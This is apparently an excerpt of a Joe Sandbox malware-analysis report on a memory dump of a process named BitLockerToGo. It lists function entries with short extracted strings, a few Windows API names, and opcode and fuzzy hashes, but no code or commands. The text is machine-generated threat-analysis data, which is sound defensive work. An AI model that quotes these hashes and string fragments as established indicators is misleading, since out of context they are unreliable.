                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ?=$J$l$lpBB$}|@F$"
                                                                                • API String ID: 0-573265808
                                                                                • Opcode ID: 9ecf212705089a33629cd1bfaa517a960d4d0e74f46b5c1cc5c4f6b21975b4f2
                                                                                • Instruction ID: 8796181359eaa17eab589a78513dc83630c0ce1183e890f43ba2b7b8ba6cb367
                                                                                • Opcode Fuzzy Hash: 9ecf212705089a33629cd1bfaa517a960d4d0e74f46b5c1cc5c4f6b21975b4f2
                                                                                • Instruction Fuzzy Hash: 565138B450C3818ED301CF69D594A2BBFE2AF97745F08489DE4D16B391C37A8909CB6B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0$0$0$@$i
                                                                                • API String ID: 0-3124195287
                                                                                • Opcode ID: 71f936c1c39428500c794c4ef3b822847572016946d7faa5528ebec6b5b1bd4e
                                                                                • Instruction ID: e41789e3dda43c5542db7e56a0a1afca13d639ff9df5f266a5d4e0b72afa8006
                                                                                • Opcode Fuzzy Hash: 71f936c1c39428500c794c4ef3b822847572016946d7faa5528ebec6b5b1bd4e
                                                                                • Instruction Fuzzy Hash: 7372C271A083519FC718CE28C68472BBBE1ABC9314F14896EE8D9A73D1D778DD05CB86
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8IVW$s$s$s$s
                                                                                • API String ID: 0-3333437331
                                                                                • Opcode ID: a8948eb919361d90e2c06e974510396d3c065f88dab6c3eb0af4d983021925eb
                                                                                • Instruction ID: d2499f734e26951dc360e9979eebf6583f3e1446674375738af4417e3fd94e49
                                                                                • Opcode Fuzzy Hash: a8948eb919361d90e2c06e974510396d3c065f88dab6c3eb0af4d983021925eb
                                                                                • Instruction Fuzzy Hash: 6312DC71A08251CFD704CF68D8A0A6BBBF1FB8A319F09846EE4859B352C734DD50DB99
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @X^3$FD76BE2C4B1B777BBDD6063A4A9627B5$XY$l$p
                                                                                • API String ID: 0-1386881881
                                                                                • Opcode ID: ff4b74dc10e88c56f0450d73b386830d6ee06fa04c14c121741a931507cb42b2
                                                                                • Instruction ID: d5cf47144278000f6806d471129db9ce31c0699c047b7c63ee8e0661a33a18ed
                                                                                • Opcode Fuzzy Hash: ff4b74dc10e88c56f0450d73b386830d6ee06fa04c14c121741a931507cb42b2
                                                                                • Instruction Fuzzy Hash: 27C102B050C3809BE311EF56D480A1FBBF8AB96708F144D2DE5D59B292C379D914CBA7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4`[b$os7$wvu$wu
                                                                                • API String ID: 0-128268441
                                                                                • Opcode ID: 07fcbbe9929cdd2841344f93ad7c0cf553ea6fc670c46a7d78be97ee27edad95
                                                                                • Instruction ID: 4b19b2eace2cc04b8936860c4d0a847f2ef68b4be23fb5af22183a1ee2d1d7d7
                                                                                • Opcode Fuzzy Hash: 07fcbbe9929cdd2841344f93ad7c0cf553ea6fc670c46a7d78be97ee27edad95
                                                                                • Instruction Fuzzy Hash: 9142CAB0600B01DFC724CF25D492B96BBF1BF45304F148A2DE59A8BB52D739E896CB94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: s$s$s$s
                                                                                • API String ID: 0-3523052760
                                                                                • Opcode ID: 973062cf9eaa28dca48778c5200a7d247711c22fe94321ba81afc45950472d5c
                                                                                • Instruction ID: 3f3999f25e9c5bb6a547de8da815c85414752641433e660e50136bcab0db9f8d
                                                                                • Opcode Fuzzy Hash: 973062cf9eaa28dca48778c5200a7d247711c22fe94321ba81afc45950472d5c
                                                                                • Instruction Fuzzy Hash: D412CD71A18250CFDB04CF28D8A166FBBF1EB8A315F49846EE8859B352C734DD40DB99
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsSystem
                                                                                • String ID:
                                                                                • API String ID: 4116985748-3916222277
                                                                                • Opcode ID: cf7031a656b8c87d03b745ca0e6078ccd6f05a724346707f3d6125389d96333d
                                                                                • Instruction ID: 243e74cfbcb7baf8ff10c528f2d53d1dc501b7d5f8bd483659958941c92e1d20
                                                                                • Opcode Fuzzy Hash: cf7031a656b8c87d03b745ca0e6078ccd6f05a724346707f3d6125389d96333d
                                                                                • Instruction Fuzzy Hash: E15162B4E142048FDB40EFADD98169DBBF0BB48310F118569E898E7350D774A944CF96
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: )$)$IEND
                                                                                • API String ID: 0-588110143
                                                                                • Opcode ID: e205e7a2d740ad0bb87cc1d324815abb38c3adde5f033f1931c432bae9eae45e
                                                                                • Instruction ID: 75489c7ae867341c364687a3339a38eeb7d17585f703578f116f22a4b4b1bb43
                                                                                • Opcode Fuzzy Hash: e205e7a2d740ad0bb87cc1d324815abb38c3adde5f033f1931c432bae9eae45e
                                                                                • Instruction Fuzzy Hash: 8AE1B2B1A087019FE310DF25D88171ABBE0BB94314F144A3EE998A73C1D779E915CBD6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: s$s$s
                                                                                • API String ID: 0-1083010603
                                                                                • Opcode ID: f7fe5b9aa1ebdefc806501125f6ad1680ab37a97e176e1e015d31072d32d5d6f
                                                                                • Instruction ID: 7da4fba8ec512e6a20b5c60970798f8f5e5374048b60e24747ec988597cea826
                                                                                • Opcode Fuzzy Hash: f7fe5b9aa1ebdefc806501125f6ad1680ab37a97e176e1e015d31072d32d5d6f
                                                                                • Instruction Fuzzy Hash: 91C1E071A042A5CFDB04CF68D8A16AFBBF1FB8A315F498069E4959B352C734DD40CB98
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "("!$* *)$[[_L
                                                                                • API String ID: 0-1313357729
                                                                                • Opcode ID: b9225df54c807827178ac486d18e7a576a5ffcb40111060254a423ee9c154843
                                                                                • Instruction ID: 362139ed5ba404d3872c2bfc52b8e08708db99788d5252469b2e0dc11d56c441
                                                                                • Opcode Fuzzy Hash: b9225df54c807827178ac486d18e7a576a5ffcb40111060254a423ee9c154843
                                                                                • Instruction Fuzzy Hash: A8B106B1E00215CFCB14CFA5D8916AEBBB1EF0A304F58456EE855AB392D738AD01CB95
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: B$A
                                                                                • API String ID: 0-3619539632
                                                                                • Opcode ID: 9c76a97e7d4da5e0f5edc430e71023b396e1818128f4884a07fca3213893baf1
                                                                                • Instruction ID: 5d5b54787eb2e6219503a7fb4deac47ac0c281a4e576d512fd7338e0e18c2803
                                                                                • Opcode Fuzzy Hash: 9c76a97e7d4da5e0f5edc430e71023b396e1818128f4884a07fca3213893baf1
                                                                                • Instruction Fuzzy Hash: D71227B14083409BD300DF18D985A5FFBF5AF8A748F54491EF5C897262E33AD984CB5A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Inf$NaN
                                                                                • API String ID: 0-3500518849
                                                                                • Opcode ID: d1e8de232098ce98696b4f72abf5cc548168827a54492e45fb772f81bf6f92ed
                                                                                • Instruction ID: 476db4706ad8f58b77e91ca53bc6bb25b8269daa7354853cb64fc5c37cd50a4a
                                                                                • Opcode Fuzzy Hash: d1e8de232098ce98696b4f72abf5cc548168827a54492e45fb772f81bf6f92ed
                                                                                • Instruction Fuzzy Hash: 42F1A572B083019BC704CF29C88165ABBE6EBC8750F158A3EF899E7390D774DD458B86
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $%$Jkji
                                                                                • API String ID: 0-3739818489
                                                                                • Opcode ID: 541095edb205ab3ec1428b336c974d1a03a08d4c572d67d76ad7a47b8a051bbb
                                                                                • Instruction ID: fe5df750f6dce56a68d381e4f87ea425800db3f6d766eda5e93d72df082e5462
                                                                                • Opcode Fuzzy Hash: 541095edb205ab3ec1428b336c974d1a03a08d4c572d67d76ad7a47b8a051bbb
                                                                                • Instruction Fuzzy Hash: 0DA1BF745083119BC710EF18D891B6BB7F1EFA5394F98890DE8C58B3A1E339D944CB9A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0$8
                                                                                • API String ID: 0-46163386
                                                                                • Opcode ID: 8a3073a85017b25d4eacbace4d2dd3963c415d0626a4c3ba28c74df4c92395a7
                                                                                • Instruction ID: 2abc89fec703ce214c345034e74b3c6e1ac8a5ed0fc613b796602d3d26278aba
                                                                                • Opcode Fuzzy Hash: 8a3073a85017b25d4eacbace4d2dd3963c415d0626a4c3ba28c74df4c92395a7
                                                                                • Instruction Fuzzy Hash: 53911335609380DFC714CF28D444B8BBBE1AF9A350F45886DE888973A2C775D959CFA2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: 4`[b$4`[b
                                                                                • API String ID: 2994545307-3640500014
                                                                                • Opcode ID: 939723bb97dca4cbaac459931abc940ec207de3c625d5056ec77b17c2418a182
                                                                                • Instruction ID: 4f6b0cce6d85ceeb9d867041b59a6c3a524408c6c70871184a36e1e39ef9be3c
                                                                                • Opcode Fuzzy Hash: 939723bb97dca4cbaac459931abc940ec207de3c625d5056ec77b17c2418a182
                                                                                • Instruction Fuzzy Hash: 652136314183409BD324FF14CA60ABEB3E1FF55309F54882EE0C897292DB34E9A1CB4A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: f
                                                                                • API String ID: 0-1993550816
                                                                                • Opcode ID: 04f981f5a9b67f449d26c8e1f25987ec09231783d65f0db023783ba146a1673e
                                                                                • Instruction ID: 72f3f7b4b24e9e63d226881b4f14ff91ec2e8f51f82c52f9c4d085f077eb9829
                                                                                • Opcode Fuzzy Hash: 04f981f5a9b67f449d26c8e1f25987ec09231783d65f0db023783ba146a1673e
                                                                                • Instruction Fuzzy Hash: E8229C715083409FE715CF18D890B2BBBE5BBC9314F188A2EF49597391D739E904CB9A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %1.17g
                                                                                • API String ID: 0-1551345525
                                                                                • Opcode ID: 11e72acd1a081ba64869f79cfbf906270d23ef5b807026980191e14521c75790
                                                                                • Instruction ID: adeb3299133604f7f3edd988431c43479dd124ff4901b3ff26fc007e2880375d
                                                                                • Opcode Fuzzy Hash: 11e72acd1a081ba64869f79cfbf906270d23ef5b807026980191e14521c75790
                                                                                • Instruction Fuzzy Hash: 6912B3B1608B41CBE7158E598480327BBE2EFA1314F19857ED8896B3D1E779DC09CF4A
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(0044DB80,00000000,00000001,0044DB70), ref: 00426B99
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInstance
                                                                                • String ID:
                                                                                • API String ID: 542301482-0
                                                                                • Opcode ID: f2ab5d2167fad3272f3f3889c0693acf97b2973b3141699d225513df077c0ee8
                                                                                • Instruction ID: 3d1ba28d9b4c96bf160605c19f5fd5d7db7cf9fa6b530f7c5b3552df7489f07c
                                                                                • Opcode Fuzzy Hash: f2ab5d2167fad3272f3f3889c0693acf97b2973b3141699d225513df077c0ee8
                                                                                • Instruction Fuzzy Hash: A2710FB1B002159BDB20AF24DC92B7773A5EF85354F49452DF98ACB390E779E804C729
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: P
                                                                                • API String ID: 0-3110715001
                                                                                • Opcode ID: c31b4e1f53d1c770e22bc9529131542f949b60ea961295dda6eac34d010be904
                                                                                • Instruction ID: 40fe23d0a74e16451ed76fc05543fd94185673bb7744c4985dcdb01b3c7fbd45
                                                                                • Opcode Fuzzy Hash: c31b4e1f53d1c770e22bc9529131542f949b60ea961295dda6eac34d010be904
                                                                                • Instruction Fuzzy Hash: 4FD107729082704FE725CE18D89072FB6E1EB85718F15863DE8A6AB381CB79DC06C7D5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: bxD
                                                                                • API String ID: 0-574992427
                                                                                • Opcode ID: 07b59c510a11e0c2ea2ab99d69d63400edf3d181ce6f7a8ee5b820fd07ae45b7
                                                                                • Instruction ID: 358600aac9798af01eccf85f3abfb009553acfa6acac8ad3aa4a62938a933ad1
                                                                                • Opcode Fuzzy Hash: 07b59c510a11e0c2ea2ab99d69d63400edf3d181ce6f7a8ee5b820fd07ae45b7
                                                                                • Instruction Fuzzy Hash: FAE13536A04251CFCB14CF68E8901AEB7B2BF89316B19427DD851AB392D335ED41CB94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: j
                                                                                • API String ID: 0-2137352139
                                                                                • Opcode ID: 2b4f7046e93cf4d16b0be0b08c64d040bdc5259ee3ae8f8f7441aab51e7ce772
                                                                                • Instruction ID: ce8ef48c7fd4ae9bfe0d26af9dfe1163e029deb6e788d3b12b2adf43fa04188c
                                                                                • Opcode Fuzzy Hash: 2b4f7046e93cf4d16b0be0b08c64d040bdc5259ee3ae8f8f7441aab51e7ce772
                                                                                • Instruction Fuzzy Hash: 0DD1ACB5508300DFD704DF28E890A9FBBF5AFC6345F04482DE98593292E739E994CB5A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: -
                                                                                • API String ID: 0-2547889144
                                                                                • Opcode ID: f473a29dcd3862d8d9934da59af0952f356f8e4c99db5708be78d68db9c0c2c6
                                                                                • Instruction ID: bb9a080d74681e008f69220e176364fe582ae8decdff2ef83218dc3371c22b40
                                                                                • Opcode Fuzzy Hash: f473a29dcd3862d8d9934da59af0952f356f8e4c99db5708be78d68db9c0c2c6
                                                                                • Instruction Fuzzy Hash: 82D12871A083454BC7188E69D8D026BBBE2ABC1324F18C73EE4A5573D5D63C9D0A8B86
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "
                                                                                • API String ID: 0-123907689
                                                                                • Opcode ID: 20fbdcfd2d6fe1da5449b24ddca540347235c37c1820cb549701539391c6e93f
                                                                                • Instruction ID: 8e74f7eb9a15b0747f2dde9d746f62c1f3ac8f4e3d52df096a1909e8abaaaabd
                                                                                • Opcode Fuzzy Hash: 20fbdcfd2d6fe1da5449b24ddca540347235c37c1820cb549701539391c6e93f
                                                                                • Instruction Fuzzy Hash: 4BC14AB1A083009BD714CF25C49076BB7E96F8C354F189A6FE89987391D738DC45C796
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: 4`[b
                                                                                • API String ID: 2994545307-3962175265
                                                                                • Opcode ID: 3aae18162f02f82d7d8ae9db18bab57009b98cbdee6eedac22f7b549da0b5ef7
                                                                                • Instruction ID: 5619542fca46ceebb120d05eff81b2419b7453a344e5f3301f2d3bbe8b878cb4
                                                                                • Opcode Fuzzy Hash: 3aae18162f02f82d7d8ae9db18bab57009b98cbdee6eedac22f7b549da0b5ef7
                                                                                • Instruction Fuzzy Hash: A291CF71608301ABF720DF14D851BAFB7E1EB85354F54482EF98593351EB38E941CB9A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: P
                                                                                • API String ID: 0-3110715001
                                                                                • Opcode ID: 0db38416f44e2d58d8164efc444be3fa4153d3513bd40590893fd85113ee0c84
                                                                                • Instruction ID: 5fec4ac7fd5575b6afc17b4a021526abc57a519ad98260d92a698f36b2913999
                                                                                • Opcode Fuzzy Hash: 0db38416f44e2d58d8164efc444be3fa4153d3513bd40590893fd85113ee0c84
                                                                                • Instruction Fuzzy Hash: 1EA12572A083608FD7049B54E8D076FB7E1EB95354F4A896EE8955B382D778CC00CBDA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ey
                                                                                • API String ID: 0-1888109701
                                                                                • Opcode ID: 7e9852d8dc85b29c0d88cdf4de9643a9d745947ae87d2c8adc38e9fd2febf548
                                                                                • Instruction ID: 05809ba15e4878c02b50c9794c91002d93c451507bda6c48f598afdd973b3d88
                                                                                • Opcode Fuzzy Hash: 7e9852d8dc85b29c0d88cdf4de9643a9d745947ae87d2c8adc38e9fd2febf548
                                                                                • Instruction Fuzzy Hash: 1C91E1B59083408BD714EF28D8816AFB7F5AFC6354F15092EF58593391E739E884CB8A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ,
                                                                                • API String ID: 0-3772416878
                                                                                • Opcode ID: d841433db4824595e50970b7f088a35fd000f808e9afe825daa6f1bb2d1d0e1e
                                                                                • Instruction ID: 4a6c79562faa4bfe21f0375b7dd8f7cecd802cd0d7544ae326046e64f3108c82
                                                                                • Opcode Fuzzy Hash: d841433db4824595e50970b7f088a35fd000f808e9afe825daa6f1bb2d1d0e1e
                                                                                • Instruction Fuzzy Hash: 8EB137712083819FD321CF18C98461BFBE1AFA9704F484E2EE5D997782D635E918CB67
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "
                                                                                • API String ID: 0-123907689
                                                                                • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                • Instruction ID: 54cd2345e50a870b8ba49db6937c3f53262b0eed8f59967641118c5b905f069e
                                                                                • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                • Instruction Fuzzy Hash: C4710632A083555BD714CE6CC98031FB7E2ABCD750F29E52EE4948B3B1D239DC458B8A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4`[b
                                                                                • API String ID: 0-3962175265
                                                                                • Opcode ID: 7dd8ec179231ae766dbf70c09c56039bea14c78df0fb98d07ce2c6d284402de7
                                                                                • Instruction ID: d20fcbfbfce42fdba56c3a4fd57172c05cc51854bc353b3a3ca6c9cdee8b8537
                                                                                • Opcode Fuzzy Hash: 7dd8ec179231ae766dbf70c09c56039bea14c78df0fb98d07ce2c6d284402de7
                                                                                • Instruction Fuzzy Hash: D75119316082009BE714AF08DC91B3FB7E2EF89715F198A2DE9D557392C735EC05875A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4`[b
                                                                                • API String ID: 0-3962175265
                                                                                • Opcode ID: 4a181a8ba54938dcfab96794cd2149ee60142d32294774a7ee142e45cdaf63d5
                                                                                • Instruction ID: 0139efa594f4316d2f8440da14a72f89608ede9921ed4265ebae546127ab026d
                                                                                • Opcode Fuzzy Hash: 4a181a8ba54938dcfab96794cd2149ee60142d32294774a7ee142e45cdaf63d5
                                                                                • Instruction Fuzzy Hash: 7251DD71518340ABD310EF28D950AAFBBF5EF86305F04882EE0C8872A2D739D950CB5B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: @
                                                                                • API String ID: 2994545307-2766056989
                                                                                • Opcode ID: 120832cc7c3a1be6d040a5668914e6d817bbfed381a23af2459afbc162f1e0ac
                                                                                • Instruction ID: bfaeeba4143c870eacf42a814fa3d072e24a1d7a643ad0f5201eaf4d4f881df3
                                                                                • Opcode Fuzzy Hash: 120832cc7c3a1be6d040a5668914e6d817bbfed381a23af2459afbc162f1e0ac
                                                                                • Instruction Fuzzy Hash: 983167745093009BE320EF15D880A2FBBF9FF9A354F14892EE5C897251D339D9148BAB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ^P]R
                                                                                • API String ID: 0-3965360892
                                                                                • Opcode ID: 9d075cd7299fd284542800039ee064922cf0b660c15d1cf799e478cf0043bdd9
                                                                                • Instruction ID: 066c69ec9a076aa51131574ad83e4e9dc79708ccc840554c44c4580e255030d4
                                                                                • Opcode Fuzzy Hash: 9d075cd7299fd284542800039ee064922cf0b660c15d1cf799e478cf0043bdd9
                                                                                • Instruction Fuzzy Hash: A921C130A0456A8BCB01CB55D64027EFBB1FF06B01FA4416AD851B7361C3659A15CBEA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4`[b
                                                                                • API String ID: 0-3962175265
                                                                                • Opcode ID: 857042449200f6e5b7d73b0cf206499d2cd691856c0187151f03ee20648b6334
                                                                                • Instruction ID: 5578fa6f53a0fba689a98ee3438f10c1d2a3dff36d3e4deb1e54bcd21b96c756
                                                                                • Opcode Fuzzy Hash: 857042449200f6e5b7d73b0cf206499d2cd691856c0187151f03ee20648b6334
                                                                                • Instruction Fuzzy Hash: 25115C71608310CBD700DF15E59092EB7F1EB8A316F98492DE885A7362D335E851CB9B
                                                                                APIs
